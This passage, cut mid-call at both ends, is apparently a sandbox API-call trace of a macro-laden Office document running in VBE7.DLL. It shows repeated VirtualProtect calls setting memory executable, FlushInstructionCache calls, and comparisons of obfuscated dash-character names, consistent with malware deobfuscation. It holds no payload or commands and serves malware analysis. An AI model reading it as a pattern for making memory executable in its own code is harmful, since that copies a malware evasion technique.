lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.891] GetCurrentProcess () returned 0xffffffff [0095.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.891] GetCurrentProcess () returned 0xffffffff [0095.892] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.892] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.892] GetCurrentProcess () returned 0xffffffff [0095.892] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.892] GetCurrentProcess () returned 0xffffffff [0095.892] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.892] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.893] GetCurrentProcess () returned 0xffffffff [0095.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.893] GetCurrentProcess () returned 0xffffffff [0095.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.893] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.894] GetCurrentProcess () returned 0xffffffff [0095.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.894] GetCurrentProcess () returned 0xffffffff [0095.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.894] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.895] GetCurrentProcess () returned 0xffffffff [0095.895] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.896] GetAsyncKeyState (vKey=3) returned 0 [0095.896] CRetailMalloc_Alloc () returned 0xcc06600 [0095.896] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.896] memcpy (in: _Dst=0xb2a5270, _Src=0x197404, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0095.896] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.896] memcpy (in: _Dst=0xb2a5168, _Src=0x1973bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.896] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x96\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 1 [0095.896] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 1 [0095.896] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x96\x96\x96\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 1 [0095.896] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x97\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 1 [0095.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82e3a, cbMultiByte=10, lpWideCharStr=0x197204, cchWideChar=11 | out: lpWideCharStr="—————–—–—") returned 10 [0095.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40286, cbMultiByte=10, lpWideCharStr=0x197264, cchWideChar=11 | out: lpWideCharStr="—————–—–—") returned 10 [0095.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40286, cbMultiByte=10, lpWideCharStr=0x197264, cchWideChar=11 | out: lpWideCharStr="—————–—–—") returned 10 [0095.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40286, cbMultiByte=10, lpWideCharStr=0x197264, cchWideChar=11 | out: lpWideCharStr="—————–—–—") returned 10 [0095.897] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x96\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 1 [0095.897] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 1 [0095.897] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x96\x96\x96\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 1 [0095.897] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x97\x97\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 1 [0095.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40286, cbMultiByte=10, lpWideCharStr=0x197264, cchWideChar=11 | out: lpWideCharStr="—————–—–—") returned 10 [0095.897] CRetailMalloc_Alloc () returned 0xc986b78 [0095.898] _mbscpy_s (in: _Dst=0xc986b78, _DstSizeInBytes=0xa, _Src=0x9a40286 | out: _Dst=0xc986b78) returned 0x0 [0095.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40bb6, cbMultiByte=17, lpWideCharStr=0x197274, cchWideChar=18 | out: lpWideCharStr="_B_var_—————–—–—") returned 17 [0095.899] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0xa, _Src=0x9a40286 | out: _Dst=0x1972dc) returned 0x0 [0095.899] CRetailMalloc_Free () returned 0x1 [0095.899] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0095.899] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.899] memcpy (in: _Dst=0xb2a516c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.899] memcpy (in: _Dst=0xb2a5168, _Src=0x197254, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.899] memcpy (in: _Dst=0xb2a5168, _Src=0x197254, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.899] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.899] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.899] memcpy (in: _Dst=0xcc06674, _Src=0x197484, _Size=0x18 | out: _Dst=0xcc06674) returned 0xcc06674 [0095.899] CRetailMalloc_Realloc () returned 0xcc06600 [0095.899] CRetailMalloc_Free () returned 0x1 [0095.900] GetCurrentProcess () returned 0xffffffff [0095.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.900] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.901] GetCurrentProcess () returned 0xffffffff [0095.901] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.901] GetCurrentProcess () returned 0xffffffff [0095.901] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.901] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.902] GetCurrentProcess () returned 0xffffffff [0095.902] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.902] GetCurrentProcess () returned 0xffffffff [0095.902] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.902] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.902] GetCurrentProcess () returned 0xffffffff [0095.902] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.902] GetCurrentProcess () returned 0xffffffff [0095.902] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.903] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.903] GetCurrentProcess () returned 0xffffffff [0095.903] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.903] GetCurrentProcess () returned 0xffffffff [0095.903] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.903] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.904] GetCurrentProcess () returned 0xffffffff [0095.904] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.904] GetCurrentProcess () returned 0xffffffff [0095.904] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.904] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.905] GetCurrentProcess () returned 0xffffffff [0095.905] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.905] GetCurrentProcess () returned 0xffffffff [0095.905] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.905] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.906] GetCurrentProcess () returned 0xffffffff [0095.906] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.906] GetCurrentProcess () returned 0xffffffff [0095.906] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.906] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.906] GetCurrentProcess () returned 0xffffffff [0095.906] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.906] GetCurrentProcess () returned 0xffffffff [0095.907] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.907] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.907] GetCurrentProcess () returned 0xffffffff [0095.907] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.907] GetCurrentProcess () returned 0xffffffff [0095.907] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.907] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.908] GetCurrentProcess () returned 0xffffffff [0095.908] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.908] GetCurrentProcess () returned 0xffffffff [0095.908] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.908] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.909] GetCurrentProcess () returned 0xffffffff [0095.909] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.909] GetCurrentProcess () returned 0xffffffff [0095.909] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.909] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.909] GetCurrentProcess () returned 0xffffffff [0095.910] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.910] GetCurrentProcess () returned 0xffffffff [0095.910] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.910] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.910] GetCurrentProcess () returned 0xffffffff [0095.910] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.910] GetCurrentProcess () returned 0xffffffff [0095.910] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.910] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.911] GetCurrentProcess () returned 0xffffffff [0095.911] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.911] GetCurrentProcess () returned 0xffffffff [0095.911] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.911] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.912] GetCurrentProcess () returned 0xffffffff [0095.912] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.912] GetCurrentProcess () returned 0xffffffff [0095.912] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.912] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.913] GetCurrentProcess () returned 0xffffffff [0095.913] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.913] GetCurrentProcess () returned 0xffffffff [0095.913] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.913] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.914] GetCurrentProcess () returned 0xffffffff [0095.914] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.914] GetCurrentProcess () returned 0xffffffff [0095.914] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.914] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.916] GetCurrentProcess () returned 0xffffffff [0095.917] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.917] GetCurrentProcess () returned 0xffffffff [0095.917] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.917] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.917] GetCurrentProcess () returned 0xffffffff [0095.917] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.917] GetCurrentProcess () returned 0xffffffff [0095.918] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.918] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.918] GetCurrentProcess () returned 0xffffffff [0095.918] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.918] GetCurrentProcess () returned 0xffffffff [0095.918] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.918] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.919] GetCurrentProcess () returned 0xffffffff [0095.919] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.919] GetCurrentProcess () returned 0xffffffff [0095.919] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.919] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.920] GetCurrentProcess () returned 0xffffffff [0095.920] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.920] GetCurrentProcess () returned 0xffffffff [0095.920] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.920] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.921] GetCurrentProcess () returned 0xffffffff [0095.921] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.921] GetCurrentProcess () returned 0xffffffff [0095.921] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.921] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.922] GetCurrentProcess () returned 0xffffffff [0095.922] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.922] GetCurrentProcess () returned 0xffffffff [0095.922] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.922] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.923] GetCurrentProcess () returned 0xffffffff [0095.923] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.923] GetCurrentProcess () returned 0xffffffff [0095.923] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.923] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.923] GetCurrentProcess () returned 0xffffffff [0095.923] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.923] GetCurrentProcess () returned 0xffffffff [0095.923] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.924] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.924] GetCurrentProcess () returned 0xffffffff [0095.924] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.924] GetCurrentProcess () returned 0xffffffff [0095.924] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.924] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.925] GetCurrentProcess () returned 0xffffffff [0095.925] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.925] GetCurrentProcess () returned 0xffffffff [0095.925] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.925] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.926] GetCurrentProcess () returned 0xffffffff [0095.926] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.926] GetCurrentProcess () returned 0xffffffff [0095.926] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.926] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.927] GetCurrentProcess () returned 0xffffffff [0095.927] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.927] GetCurrentProcess () returned 0xffffffff [0095.927] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.927] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0095.928] GetCurrentProcess () returned 0xffffffff [0095.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.929] GetAsyncKeyState (vKey=3) returned 0 [0095.932] GetAsyncKeyState (vKey=3) returned 0 [0095.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.932] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0095.932] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0095.932] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x197b90 | out: ppsaOut=0x197b90) returned 0x0 [0095.932] SafeArrayAllocData (psa=0xc98b980) returned 0x0 [0095.951] VarBstrCat (in: bstrLeft="&", bstrRight="H", pbstrResult=0x197ac4 | out: pbstrResult=0x197ac4) returned 0x0 [0095.951] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.951] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.951] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.951] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.951] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.951] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.951] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0095.951] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0095.952] CRetailMalloc_Alloc () returned 0xcc066c8 [0095.952] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.952] memcpy (in: _Dst=0xb2a516c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.952] memcpy (in: _Dst=0xb2a5170, _Src=0x19741c, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.952] memcpy (in: _Dst=0xb2a516c, _Src=0x1973c8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.952] memcpy (in: _Dst=0xb2a5170, _Src=0x19741c, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a81146, cbMultiByte=4, lpWideCharStr=0x197204, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0095.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11301146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0095.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11301146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0095.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11301146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0095.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11301146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0095.953] CRetailMalloc_Alloc () returned 0xf4a26a0 [0095.953] _mbscpy_s (in: _Dst=0xf4a26a0, _DstSizeInBytes=0x4, _Src=0x11301146 | out: _Dst=0xf4a26a0) returned 0x0 [0095.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40be6, cbMultiByte=11, lpWideCharStr=0x197274, cchWideChar=12 | out: lpWideCharStr="_B_var_Mid") returned 11 [0095.953] CRetailMalloc_Free () returned 0x1 [0095.953] memcpy (in: _Dst=0xb2a5168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0095.954] memcpy (in: _Dst=0xcc06710, _Src=0x197484, _Size=0x18 | out: _Dst=0xcc06710) returned 0xcc06710 [0095.954] CRetailMalloc_Realloc () returned 0xcc066c8 [0095.954] CRetailMalloc_Free () returned 0x1 [0095.954] GetCurrentProcess () returned 0xffffffff [0095.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, 